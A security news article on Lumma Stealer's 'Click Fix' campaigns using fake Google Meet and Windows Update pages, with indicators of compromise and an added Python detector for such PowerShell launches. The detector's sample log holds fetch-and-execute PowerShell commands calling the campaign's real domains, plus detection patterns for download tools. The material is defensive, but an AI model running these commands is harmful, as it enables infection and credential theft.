Cyber Security News

Lumma Stealer Using Fake Google Meet & Windows Update Sites to Launch “Click Fix” Style Attack

Cybersecurity researchers continue to track sophisticated “Click Fix” style distribution campaigns that deliver the notorious Lumma Stealer malware to unsuspecting victims.

These tactics, initially documented by Unit42 researchers Billy Melicher and Nabeel Mohamed, rely on social engineering to get users to execute malicious PowerShell commands themselves, which ultimately deploys the information-stealing malware.

Lumma Stealer

Lumma Stealer, also known as LummaC2 Stealer, is a potent information-stealing malware operating under a Malware-as-a-Service (MaaS) model that has been available on Russian-speaking underground forums since at least August 2022.

Developed by a threat actor using the aliases “Shamel” and “Lumma,” this sophisticated C-language malware targets an extensive range of sensitive data on compromised systems, including cryptocurrency wallets, web browser information, email credentials, financial data, and sensitive files.

The malware has shown considerable adaptability: recent versions use the ChaCha20 cipher to decrypt their embedded configuration, which keeps command-and-control details out of reach of simple static analysis and signature-based detection.

The “Click Fix” distribution method represents a particularly insidious social engineering technique first documented in 2024.

This method creates web pages that covertly insert malicious code into the victim’s clipboard when they interact with seemingly legitimate verification interfaces.

The technique stands out for its psychological manipulation: rather than relying on a conventional malicious download, it instructs users to open the Run dialog (Windows+R) and paste the preloaded command themselves. Because the victim launches the command, no exploit, attachment or installer is needed; the user is tricked into self-infection.

Evolving “Click Fix” Distribution Tactics

According to the Cyber Security News technical analysis, this approach involves web pages that insert scripts into the clipboard and prompt users to paste them into the Run dialog.

For instance, a Fake Google Meet Page hosted on Google Sites instructed users to verify their accounts by executing a PowerShell command.

This command retrieved a script from “tlgrm-redirect[.]icu/1.txt,” initiating a complex infection chain.

Another campaign involved a Fake Windows Update Site at “windows-update[.]site,” where users were prompted to execute a PowerShell command that retrieved a malicious payload from “overcoatpassably[.]shop.”

From a technical analysis perspective, recent campaigns have involved specific malicious files: a PowerShell script (SHA256: 909ed8a1351f9a21ebdd5d8efb4147145f12d5d24225dbd44cd2800a1f94a596) and a zip archive (SHA256: 0608775a345c5a0869418ffddd1f694cb888fe8acde6d34543516db1a01e3ef8) containing Lumma Stealer components.

This approach sidesteps controls built around malicious attachments and downloads: there is no file for an email gateway to scan, and the payload is fetched by a signed Microsoft binary over ordinary outbound HTTP(S), which most perimeter filtering allows. Meanwhile the "verification" pretext leaves the victim believing the action was legitimate.

Victims are tricked into executing PowerShell commands that download and execute further payloads. These commands often carry base64-encoded stages, so the URL or script being fetched is not visible in the process command line without decoding it; PowerShell Script Block Logging (Event ID 4104) records the decoded content and is the most reliable source for this kind of monitoring.
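As an added example (not code from the article or from Unit42), the following Python script shows what monitoring for this chain looks like in practice: it walks process-creation records, decodes PowerShell's -EncodedCommand argument (base64 over UTF-16LE), flags command lines with the traits of a paste-and-run launch, and matches any domains against the infrastructure named in this article. The tab-separated log format, the rule that a Run-dialog launch has explorer.exe as its parent, and the sample log lines are all constructed assumptions for the demonstration.

```python
"""Added example: flag ClickFix-style PowerShell launches in process-creation logs."""
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional

# Infrastructure named in the article, with the defanging brackets removed for matching.
IOC_DOMAINS = {
    "tlgrm-redirect.icu", "windows-update.site", "overcoatpassably.shop",
    "web-security3.com", "codxefusion.top", "techspherxe.top", "farmingtzricks.top",
}

# Command-line traits of paste-and-run chains; each hit contributes one reason.
# PowerShell accepts any unambiguous prefix of -EncodedCommand, hence the alternation.
PATTERNS = [
    (re.compile(r"-(?:encodedcommand|enc|en|ec|e)\b", re.I), "encoded command"),
    (re.compile(r"\biex\b|invoke-expression", re.I), "Invoke-Expression"),
    (re.compile(r"\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|"
                r"downloadfile|net\.webclient|curl|wget|mshta)\b", re.I), "remote fetch"),
    (re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I), "hidden window"),
    (re.compile(r"-nop\b|-noprofile\b", re.I), "no profile"),
]
B64_RE = re.compile(r"-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]{16,})", re.I)
DOMAIN_RE = re.compile(r"[a-z0-9.-]+\.[a-z]{2,}", re.I)


@dataclass
class Finding:
    line_no: int
    parent: str
    reasons: List[str] = field(default_factory=list)
    decoded: Optional[str] = None
    ioc_domains: List[str] = field(default_factory=list)


def encode_command(script: str) -> str:
    """Produce an -EncodedCommand blob the way PowerShell expects it (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Recover the script hidden behind -EncodedCommand; None if absent or malformed."""
    m = B64_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def parse_line(line: str):
    """Assumed log format: ParentImage<TAB>Image<TAB>CommandLine (command line last, may contain tabs)."""
    parts = line.rstrip("\n").split("\t", 2)
    return parts if len(parts) == 3 else None


def analyze(line_no: int, line: str) -> Optional[Finding]:
    rec = parse_line(line)
    if rec is None:
        return None
    parent, image, cmdline = rec
    if not image.lower().endswith(("powershell.exe", "pwsh.exe")):
        return None
    decoded = decode_encoded_command(cmdline)
    text = cmdline + (" " + decoded if decoded else "")      # inspect the decoded stage too
    reasons = [label for rx, label in PATTERNS if rx.search(text)]
    iocs = sorted({d.lower() for d in DOMAIN_RE.findall(text) if d.lower() in IOC_DOMAINS})
    # Assumption: a command typed into Win+R is spawned by explorer.exe.
    from_run_dialog = parent.lower().endswith("explorer.exe")
    if iocs or (from_run_dialog and reasons):
        return Finding(line_no, parent, reasons, decoded, iocs)
    return None


def scan(lines) -> List[Finding]:
    return [f for f in (analyze(i, l) for i, l in enumerate(lines, 1)) if f]


PS = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
# Constructed sample records; the two malicious ones are modeled on the article's description.
SAMPLE_LOG = [
    "C:\\Windows\\System32\\cmd.exe\t" + PS + "\tpowershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "C:\\Windows\\explorer.exe\t" + PS + "\tpowershell -w hidden -c \"iex (irm https://tlgrm-redirect.icu/1.txt)\"",
    "C:\\Windows\\explorer.exe\t" + PS + "\tpowershell -nop -w hidden -enc "
    + encode_command("iex (irm https://overcoatpassably.shop/x)"),
    "C:\\Windows\\explorer.exe\t" + PS + "\tpowershell.exe",   # interactive session, nothing suspicious
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"line {f.line_no}: {', '.join(f.reasons)}; IOC domains: {f.ioc_domains}")
        if f.decoded:
            print(f"  decoded stage: {f.decoded}")
```

Two design choices are worth noting. Benign automation (line 1) is not flagged even though it uses -ExecutionPolicy Bypass, because the parent is cmd.exe and nothing is fetched from the network; an interactive shell launched from explorer.exe (line 4) is not flagged either, because it carries none of the download-and-execute traits. The domain match runs against the decoded stage as well, which is the only way the -EncodedCommand variant reveals its download URL.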

Attackers use zip archives containing decoy files and a legitimate, typically signed, executable that side-loads a malicious DLL dropped beside it under a name the executable expects.

This provides effective camouflage: the running process image and its signature check out, while the malicious code executes inside the side-loaded DLL. Detection therefore has to look at the loaded DLL (its path, signature and hash), not only at the process.

The malware communicates with command and control (C2) domains, including “web-security3[.]com,” “codxefusion[.]top,” “techspherxe[.]top,” and “farmingtzricks[.]top.”

These domains play a crucial role in the malware’s operation, facilitating data exfiltration and command execution.

The evolving tactics of Lumma Stealer highlight the ongoing challenge of defending against sophisticated malware campaigns.

By combining social engineering with technical evasion techniques, attackers continue to successfully bypass traditional security controls.

Organizations must maintain awareness of these emerging tactics and adapt their defensive strategies accordingly to mitigate the risks associated with Lumma Stealer.


Kaaviya

Kaaviya is a Security Editor and fellow reporter with Cyber Security News. She is covering various cyber security incidents happening in the Cyber Space.
